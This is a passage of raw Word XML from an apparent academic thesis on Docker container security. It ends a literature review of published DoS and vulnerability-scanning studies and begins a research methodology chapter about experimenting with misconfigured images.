      </w:r>
      <w:r w:rsidR="008403FA">
        <w:t xml:space="preserve"> S</w:t>
      </w:r>
      <w:r w:rsidR="00E32151">
        <w:t>imilar work is also p</w:t>
      </w:r>
      <w:r w:rsidR="008403FA">
        <w:t>resented</w:t>
      </w:r>
      <w:r w:rsidR="00E32151">
        <w:t xml:space="preserve"> in </w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:id w:val="1910106470"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtEndPr/>
        <w:sdtContent>
          <w:r w:rsidR="00E32151">
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="00E32151">
            <w:instrText xml:space="preserve"> CITATION KBr20 \l 2057 </w:instrText>
          </w:r>
          <w:r w:rsidR="00E32151">
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="00D77023" w:rsidRPr="00D77023">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t>[76]</w:t>
          </w:r>
          <w:r w:rsidR="00E32151">
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:r w:rsidR="00E32151">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="335D9377" w14:textId="2D529D2A" w:rsidR="008403FA" w:rsidRDefault="00664AB3" w:rsidP="00664AB3">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="57" w:name="_Toc86859272"/>
      <w:r>
        <w:t>Docker Outside Threats</w:t>
      </w:r>
      <w:bookmarkEnd w:id="57"/>
    </w:p>
    <w:p w14:paraId="55640DA7" w14:textId="5CA37474" w:rsidR="00664AB3" w:rsidRDefault="004162DB" w:rsidP="00664AB3">
      <w:r>
        <w:t xml:space="preserve">The security threats of </w:t>
      </w:r>
      <w:r w:rsidR="008E2033">
        <w:t xml:space="preserve">Docker can come from anywhere because </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">it </w:t>
      </w:r>
      <w:r w:rsidR="008E2033">
        <w:t>involves various technologies in its surrounding.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> For this reason, it is more complex to secure </w:t>
      </w:r>
      <w:r w:rsidR="00476085">
        <w:t xml:space="preserve">the </w:t>
      </w:r>
      <w:r>
        <w:t>Docker ecosystem than other deployment technologies.</w:t>
      </w:r>
      <w:r w:rsidR="00476085">
        <w:t xml:space="preserve"> Tomar and Jeena in </w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:id w:val="1191268503"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtEndPr/>
        <w:sdtContent>
          <w:r w:rsidR="00000557">
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="00000557">
            <w:instrText xml:space="preserve"> CITATION ATo20 \l 2057 </w:instrText>
          </w:r>
          <w:r w:rsidR="00000557">
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="00D77023" w:rsidRPr="00D77023">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t>[77]</w:t>
          </w:r>
          <w:r w:rsidR="00000557">
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:r w:rsidR="00000557">
        <w:t xml:space="preserve"> experiment</w:t>
      </w:r>
      <w:r w:rsidR="00B6116D">
        <w:t>ed with</w:t>
      </w:r>
      <w:r w:rsidR="00BA1FB5">
        <w:t xml:space="preserve"> Dos attack on containers</w:t>
      </w:r>
      <w:r w:rsidR="00B6116D">
        <w:t xml:space="preserve"> connected to the same network</w:t>
      </w:r>
      <w:r w:rsidR="00E1117D">
        <w:t xml:space="preserve"> on Docker version 19.03.02</w:t>
      </w:r>
      <w:r w:rsidR="00BA1FB5">
        <w:t xml:space="preserve">. The authors </w:t>
      </w:r>
      <w:r w:rsidR="00B6116D">
        <w:t>utilise</w:t>
      </w:r>
      <w:r w:rsidR="00BA1FB5">
        <w:t xml:space="preserve"> kali Linux tools hping3 and Nmap to carry out the attack</w:t>
      </w:r>
      <w:r w:rsidR="00B6116D">
        <w:t xml:space="preserve"> by inundating</w:t>
      </w:r>
      <w:r w:rsidR="00ED62A6">
        <w:t xml:space="preserve"> packets to the</w:t>
      </w:r>
      <w:r w:rsidR="00B6116D">
        <w:t xml:space="preserve"> target </w:t>
      </w:r>
      <w:r w:rsidR="00ED62A6">
        <w:t>container</w:t>
      </w:r>
      <w:r w:rsidR="00B6116D">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="004E01C4">
        <w:t xml:space="preserve"> Further, they </w:t>
      </w:r>
      <w:r w:rsidR="005544E3">
        <w:t xml:space="preserve">proposed a layered approach to group the various attack </w:t>
      </w:r>
      <w:r w:rsidR="004A52C4">
        <w:t xml:space="preserve">scenarios </w:t>
      </w:r>
      <w:r w:rsidR="00DA02AB">
        <w:t>within</w:t>
      </w:r>
      <w:r w:rsidR="005544E3">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="004A52C4">
        <w:t xml:space="preserve">the </w:t>
      </w:r>
      <w:r w:rsidR="005544E3">
        <w:t>Docker eco</w:t>
      </w:r>
      <w:r w:rsidR="004A52C4">
        <w:t>sphere (container, host, application, and Docker engine). They also provide a detailed description and classification of all possible attacks on each layer, as seen in figure</w:t>
      </w:r>
      <w:r w:rsidR="00DA02AB">
        <w:t xml:space="preserve"> 6.</w:t>
      </w:r>
      <w:r w:rsidR="00B71B27">
        <w:t xml:space="preserve"> This article presented and described the possible attacks in meticulous detail, though it covers fewer reference numbers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D0C8415" w14:textId="54EBE9FC" w:rsidR="00DA02AB" w:rsidRDefault="00DA02AB" w:rsidP="00DA02AB">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2B58ED68" wp14:editId="7C9AAD01">
            <wp:extent cx="2914650" cy="323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4650" cy="3238500"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="797C54AA" w14:textId="0DAF2FAE" w:rsidR="00DA02AB" w:rsidRDefault="00DA02AB" w:rsidP="00DA02AB">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="58" w:name="_Toc86858597"/>
      <w:r w:rsidRPr="00DA02AB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidRPr="00DA02AB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="00DA02AB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidRPr="00DA02AB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00A53E61">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:noProof/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>6</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA02AB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00DA02AB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">: Docker attacks classification </w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:rPr>
            <w:b/>
            <w:bCs/>
            <w:i w:val="0"/>
            <w:iCs w:val="0"/>
            <w:color w:val="000000" w:themeColor="text1"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:id w:val="1364794182"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtEndPr/>
        <w:sdtContent>
          <w:r w:rsidRPr="00DA02AB">
            <w:rPr>
              <w:b/>
              <w:bCs/>
              <w:i w:val="0"/>
              <w:iCs w:val="0"/>
              <w:color w:val="000000" w:themeColor="text1"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidRPr="00DA02AB">
            <w:rPr>
              <w:b/>
              <w:bCs/>
              <w:i w:val="0"/>
              <w:iCs w:val="0"/>
              <w:color w:val="000000" w:themeColor="text1"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:instrText xml:space="preserve"> CITATION ATo20 \l 2057 </w:instrText>
          </w:r>
          <w:r w:rsidRPr="00DA02AB">
            <w:rPr>
              <w:b/>
              <w:bCs/>
              <w:i w:val="0"/>
              <w:iCs w:val="0"/>
              <w:color w:val="000000" w:themeColor="text1"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="00D77023" w:rsidRPr="00D77023">
            <w:rPr>
              <w:noProof/>
              <w:color w:val="000000" w:themeColor="text1"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:t>[77]</w:t>
          </w:r>
          <w:r w:rsidRPr="00DA02AB">
            <w:rPr>
              <w:b/>
              <w:bCs/>
              <w:i w:val="0"/>
              <w:iCs w:val="0"/>
              <w:color w:val="000000" w:themeColor="text1"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:r w:rsidRPr="00DA02AB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="58"/>
    </w:p>
    <w:p w14:paraId="47CA1EA5" w14:textId="021C4504" w:rsidR="00E1117D" w:rsidRDefault="00851320" w:rsidP="00E1117D">
      <w:r>
        <w:t>The researchers i</w:t>
      </w:r>
      <w:r w:rsidR="00E1117D">
        <w:t xml:space="preserve">n </w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:id w:val="-558942383"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtEndPr/>
        <w:sdtContent>
          <w:r w:rsidR="003A2AB2">
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="003A2AB2">
            <w:instrText xml:space="preserve"> CITATION AAM16 \l 2057 </w:instrText>
          </w:r>
          <w:r w:rsidR="003A2AB2">
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="00D77023" w:rsidRPr="00D77023">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t>[78]</w:t>
          </w:r>
          <w:r w:rsidR="003A2AB2">
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:r>
        <w:t xml:space="preserve"> performed a comparative</w:t>
      </w:r>
      <w:r w:rsidR="003A2AB2">
        <w:t xml:space="preserve"> experiment with attacks to evaluate the security of Docker containers.</w:t>
      </w:r>
      <w:r w:rsidR="00076C37">
        <w:t xml:space="preserve"> They compare</w:t>
      </w:r>
      <w:r w:rsidR="00130CC2">
        <w:t>d</w:t>
      </w:r>
      <w:r w:rsidR="00076C37">
        <w:t xml:space="preserve"> the </w:t>
      </w:r>
      <w:r w:rsidR="00130CC2">
        <w:t>attack surface</w:t>
      </w:r>
      <w:r w:rsidR="00076C37">
        <w:t xml:space="preserve"> of </w:t>
      </w:r>
      <w:r w:rsidR="00AA08D5">
        <w:t>running a service in a container against a service running in a typical host machine.</w:t>
      </w:r>
      <w:r w:rsidR="00130CC2">
        <w:t xml:space="preserve"> They installed Apache, MySQL, and Nginx on a Debian host</w:t>
      </w:r>
      <w:r w:rsidR="002C3C7E">
        <w:t>. Simultaneously the authors created three different containers from Docker hub</w:t>
      </w:r>
      <w:r w:rsidR="0084287C">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="002C3C7E">
        <w:t xml:space="preserve"> one for each service.</w:t>
      </w:r>
      <w:r w:rsidR="0084287C">
        <w:t xml:space="preserve"> To run the experiment, they run Nessus scanner locally to detect the vulnerabilities on each side. Their findings indicate that containers </w:t>
      </w:r>
      <w:r w:rsidR="00971F44">
        <w:t>expose to more vulnerabilities compared to VM or typical hosts</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:id w:val="-2005814092"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtEndPr/>
        <w:sdtContent>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> CITATION AAM16 \l 2057 </w:instrText>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="00D77023" w:rsidRPr="00D77023">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t>[78]</w:t>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:r w:rsidR="00971F44">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="0084287C">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5256F4FC" w14:textId="3A3015DC" w:rsidR="003A0683" w:rsidRDefault="003A0683" w:rsidP="003A0683">
      <w:r>
        <w:t xml:space="preserve">The vulnerability analysis of Docker ecosphere </w:t>
      </w:r>
      <w:r w:rsidR="000F25EE">
        <w:t>comprises</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> four main areas: isolation</w:t>
      </w:r>
      <w:r w:rsidR="000F25EE">
        <w:t xml:space="preserve"> of file system within a container</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, host resource management, network, and process isolation, according to the study in </w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:id w:val="-998188407"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtEndPr/>
        <w:sdtContent>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> CITATION JWe20 \l 2057 </w:instrText>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="00D77023" w:rsidRPr="00D77023">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t>[79]</w:t>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:r w:rsidR="000F25EE">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="00FD7639" w:rsidRPr="00FD7639">
        <w:t>The authors emphasise that providing more splendid isolation of files system</w:t>
      </w:r>
      <w:r w:rsidR="005D7784">
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidR="00FD7639" w:rsidRPr="00FD7639">
        <w:t xml:space="preserve"> and processes running inside a container increases the security of Docker significantly.</w:t>
      </w:r>
      <w:r w:rsidR="005D7784">
        <w:t xml:space="preserve"> In addition, </w:t>
      </w:r>
      <w:r w:rsidR="00040AEC">
        <w:t>resources management using Cgroups helps to reduce the potential vulnerability threats</w:t>
      </w:r>
      <w:r w:rsidR="00652F04">
        <w:t xml:space="preserve"> significantly</w:t>
      </w:r>
      <w:r w:rsidR="00040AEC">
        <w:t xml:space="preserve"> in Docker. Further, the authors briefly </w:t>
      </w:r>
      <w:r w:rsidR="009F65E0">
        <w:t>introduce the concept of various Linux capabilities features, including AppArmor, Seccomp and mandatory access control (MAC).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22324767" w14:textId="4C9BED16" w:rsidR="009F65E0" w:rsidRDefault="009F65E0" w:rsidP="009F65E0">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="59" w:name="_Toc86859273"/>
      <w:r>
        <w:t>SUMMARY</w:t>
      </w:r>
      <w:bookmarkEnd w:id="59"/>
    </w:p>
    <w:p w14:paraId="14E331A6" w14:textId="17D48614" w:rsidR="001C4FDA" w:rsidRDefault="001C4FDA" w:rsidP="001C4FDA">
      <w:r>
        <w:t xml:space="preserve">In summary, this chapter provided a detailed literature review of </w:t>
      </w:r>
      <w:r w:rsidR="0047796D">
        <w:t>current Docker security</w:t>
      </w:r>
      <w:r w:rsidR="0029212C">
        <w:t xml:space="preserve">, focusing on previous related and relevant works to the subject and the development of the </w:t>
      </w:r>
      <w:r w:rsidR="0029212C">
        <w:lastRenderedPageBreak/>
        <w:t>overall design of this project.</w:t>
      </w:r>
      <w:r w:rsidR="001036D9">
        <w:t xml:space="preserve"> Based on those works, the au</w:t>
      </w:r>
      <w:r w:rsidR="00652F04">
        <w:t xml:space="preserve">thor </w:t>
      </w:r>
      <w:r w:rsidR="001036D9">
        <w:t xml:space="preserve">concluded that privilege escalation and image misconfiguration are the </w:t>
      </w:r>
      <w:r w:rsidR="00652F04">
        <w:t>primary</w:t>
      </w:r>
      <w:r w:rsidR="001036D9">
        <w:t xml:space="preserve"> security concern within Docker systems.</w:t>
      </w:r>
      <w:r w:rsidR="00DC46CD">
        <w:t xml:space="preserve"> The author has also realised that Docker involves multiple technologies, making it more complex to secure.</w:t>
      </w:r>
      <w:r w:rsidR="00345EB6">
        <w:t xml:space="preserve"> As a result, it is more susceptible to multiple security attacks.</w:t>
      </w:r>
      <w:r w:rsidR="00A21FE0">
        <w:t xml:space="preserve"> In a nutshell, Docker is a new technology, and thus its security has not been tested adequately and requires much work to its improvement.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F285966" w14:textId="20367C3A" w:rsidR="00E70015" w:rsidRDefault="00E70015" w:rsidP="001C4FDA">
      <w:r>
        <w:t>The next chapter will discuss the methodologies and strategies used to develop the project’s aims and objectives.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6548830D" w14:textId="77777777" w:rsidR="004D467B" w:rsidRPr="001C4FDA" w:rsidRDefault="004D467B" w:rsidP="001C4FDA"/>
    <w:p w14:paraId="491B73B5" w14:textId="77777777" w:rsidR="009F65E0" w:rsidRPr="009F65E0" w:rsidRDefault="009F65E0" w:rsidP="009F65E0"/>
    <w:p w14:paraId="7D8E2ACE" w14:textId="348B12CF" w:rsidR="003A0683" w:rsidRDefault="003A0683" w:rsidP="00E1117D"/>
    <w:p w14:paraId="10DEBEEC" w14:textId="77777777" w:rsidR="00314922" w:rsidRDefault="00314922" w:rsidP="00E1117D"/>
    <w:p w14:paraId="4421EC9B" w14:textId="2B6E8A6B" w:rsidR="00314922" w:rsidRDefault="00314922" w:rsidP="00E1117D"/>
    <w:p w14:paraId="4AC0EA7C" w14:textId="65F0790D" w:rsidR="00CD1685" w:rsidRDefault="00CD1685" w:rsidP="00E1117D"/>
    <w:p w14:paraId="5560D80A" w14:textId="7F4CDC2F" w:rsidR="00CD1685" w:rsidRDefault="00CD1685" w:rsidP="00E1117D"/>
    <w:p w14:paraId="42A7EE23" w14:textId="3F678051" w:rsidR="00CD1685" w:rsidRDefault="00CD1685" w:rsidP="00E1117D"/>
    <w:p w14:paraId="00B287D5" w14:textId="5C11B923" w:rsidR="00CD1685" w:rsidRDefault="00CD1685" w:rsidP="00E1117D"/>
    <w:p w14:paraId="2EF86DDA" w14:textId="0B9B05FC" w:rsidR="00CD1685" w:rsidRDefault="00CD1685" w:rsidP="00E1117D"/>
    <w:p w14:paraId="55415A74" w14:textId="4738000A" w:rsidR="00CD1685" w:rsidRDefault="00CD1685" w:rsidP="00E1117D"/>
    <w:p w14:paraId="4A6648B0" w14:textId="50FF6599" w:rsidR="00CD1685" w:rsidRDefault="00CD1685" w:rsidP="00E1117D"/>
    <w:p w14:paraId="70E97A5E" w14:textId="4808558B" w:rsidR="00CD1685" w:rsidRDefault="00CD1685" w:rsidP="00E1117D"/>
    <w:p w14:paraId="02C696D5" w14:textId="77777777" w:rsidR="00CD1685" w:rsidRDefault="00CD1685" w:rsidP="00E1117D"/>
    <w:p w14:paraId="05B79CE8" w14:textId="77777777" w:rsidR="00416917" w:rsidRDefault="00416917" w:rsidP="00955EA7"/>
    <w:p w14:paraId="0AAF35B1" w14:textId="0DDB2D60" w:rsidR="00710FDE" w:rsidRDefault="00FB3BB3" w:rsidP="00D92488">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="60" w:name="_Toc86859274"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>–</w:t>
      </w:r>
      <w:r w:rsidR="00AE7D5F">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">RESEARCH </w:t>
      </w:r>
      <w:r w:rsidR="00C961D3">
        <w:t>METHODOLOGY</w:t>
      </w:r>
      <w:bookmarkEnd w:id="60"/>
      <w:r w:rsidR="00C961D3">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43C03DAB" w14:textId="2C68750C" w:rsidR="00AE7D5F" w:rsidRDefault="00AE7D5F" w:rsidP="00AE7D5F">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="61" w:name="_Toc86859275"/>
      <w:r>
        <w:t>OVERVIEW</w:t>
      </w:r>
      <w:bookmarkEnd w:id="61"/>
    </w:p>
    <w:p w14:paraId="3E5F178A" w14:textId="4B8EC8E0" w:rsidR="00FB3BB3" w:rsidRDefault="00FF04E4" w:rsidP="00FB3BB3">
      <w:r>
        <w:t xml:space="preserve">This chapter </w:t>
      </w:r>
      <w:r w:rsidR="004D0998">
        <w:t>discuss</w:t>
      </w:r>
      <w:r w:rsidR="00413B4A">
        <w:t>es</w:t>
      </w:r>
      <w:r w:rsidR="004D0998">
        <w:t xml:space="preserve"> the research methods and approaches used to develop the research</w:t>
      </w:r>
      <w:r w:rsidR="00001CB2">
        <w:t>’s</w:t>
      </w:r>
      <w:r w:rsidR="004D0998">
        <w:t xml:space="preserve"> objectives and aims.</w:t>
      </w:r>
      <w:r w:rsidR="00113DF7">
        <w:t xml:space="preserve"> The project aim is to conduct security attacks on Docker environment using misconfigured or poisoned images.</w:t>
      </w:r>
      <w:r w:rsidR="00413B4A">
        <w:t xml:space="preserve"> This chapter outlines</w:t>
      </w:r>
      <w:r w:rsidR="005139B5">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00413B4A">
        <w:t>and discusses t</w:t>
      </w:r>
      <w:r w:rsidR="005139B5">
        <w:t xml:space="preserve">he research methodology </w:t>
      </w:r>
      <w:r w:rsidR="00413B4A">
        <w:t>based on the research onion philosophy</w:t>
      </w:r>
      <w:r w:rsidR="00616C79">
        <w:t>, including</w:t>
      </w:r>
      <w:r w:rsidR="00413B4A">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00616C79">
        <w:t xml:space="preserve">the </w:t>
      </w:r>
      <w:r w:rsidR="00413B4A">
        <w:t xml:space="preserve">research approach, design, strategies, </w:t>
      </w:r>
      <w:r w:rsidR="00616C79">
        <w:t xml:space="preserve">process, data collection, and </w:t>
      </w:r>
      <w:r w:rsidR="00413B4A">
        <w:t>methodology</w:t>
      </w:r>
      <w:r w:rsidR="00082E5A">
        <w:t xml:space="preserve"> used in this study</w:t>
      </w:r>
      <w:r w:rsidR="00413B4A">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00616C79">
        <w:t xml:space="preserve"> The</w:t>
      </w:r>
      <w:r w:rsidR="00196133">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00616C79">
        <w:t xml:space="preserve">research methodology </w:t>
      </w:r>
      <w:r w:rsidR="00196133">
        <w:t>aims</w:t>
      </w:r>
      <w:r w:rsidR="00616C79">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00082E5A">
        <w:t xml:space="preserve">to provide the researcher </w:t>
      </w:r>
      <w:r w:rsidR="00196133">
        <w:t xml:space="preserve">with </w:t>
      </w:r>
      <w:r w:rsidR="00082E5A">
        <w:t xml:space="preserve">better familiarity with the project’s topic in </w:t>
      </w:r>
      <w:r w:rsidR="00196133">
        <w:t xml:space="preserve">concise and </w:t>
      </w:r>
      <w:r w:rsidR="00082E5A">
        <w:t xml:space="preserve">systematic </w:t>
      </w:r>
      <w:r w:rsidR="00196133">
        <w:t>methods</w:t>
      </w:r>
      <w:r w:rsidR="00082E5A">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00395117">
        <w:t xml:space="preserve"> Such methods will provide the author with a clear structure of the road path to achieve the goals and objectives of the project.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FBD09C6" w14:textId="381F78A3" w:rsidR="0027684B" w:rsidRDefault="0027684B" w:rsidP="0027684B">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="62" w:name="_Toc86859276"/>
      <w:r>
        <w:t>RESEARCH PHILOSOPHY</w:t>
      </w:r>
      <w:bookmarkEnd w:id="62"/>
    </w:p>
    <w:p w14:paraId="2A63DF0E" w14:textId="4D19B683" w:rsidR="0027684B" w:rsidRDefault="00F76DFD" w:rsidP="0049220F">
      <w:r>
        <w:t xml:space="preserve">This project </w:t>
      </w:r>
      <w:r w:rsidR="002E58B9">
        <w:t xml:space="preserve">aims to </w:t>
      </w:r>
      <w:r w:rsidR="00712E94">
        <w:t>experiment</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="002E58B9">
        <w:t xml:space="preserve">with </w:t>
      </w:r>
      <w:r w:rsidR="00712E94">
        <w:t xml:space="preserve">security </w:t>
      </w:r>
      <w:r>
        <w:t>attack</w:t>
      </w:r>
      <w:r w:rsidR="00712E94">
        <w:t>s</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> on </w:t>
      </w:r>
      <w:r w:rsidR="002E58B9">
        <w:t xml:space="preserve">a </w:t>
      </w:r>
      <w:r>
        <w:t>Docker environment with misconfigured images.</w:t>
      </w:r>
      <w:r w:rsidR="008D7A60">
        <w:t xml:space="preserve"> In th</w:t>
      </w:r>
      <w:r w:rsidR="0049220F">
        <w:t>is case</w:t>
      </w:r>
      <w:r w:rsidR="008D7A60">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="009C6CC7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="008D7A60">
        <w:t>d</w:t>
      </w:r>
      <w:r w:rsidR="00306271">
        <w:t>ata will be collected and interpreted</w:t>
      </w:r>
      <w:r w:rsidR="002E58B9">
        <w:t xml:space="preserve"> during and after the </w:t>
      </w:r>
      <w:r w:rsidR="002F6C0A">
        <w:t>experiment</w:t>
      </w:r>
      <w:r w:rsidR="0049220F">
        <w:t xml:space="preserve">. Therefore, </w:t>
      </w:r>
      <w:r w:rsidR="00EA51FD">
        <w:t xml:space="preserve">the </w:t>
      </w:r>
      <w:r w:rsidR="0049220F">
        <w:t xml:space="preserve">positivism approach was used to deal with </w:t>
      </w:r>
      <w:r w:rsidR="00950A03">
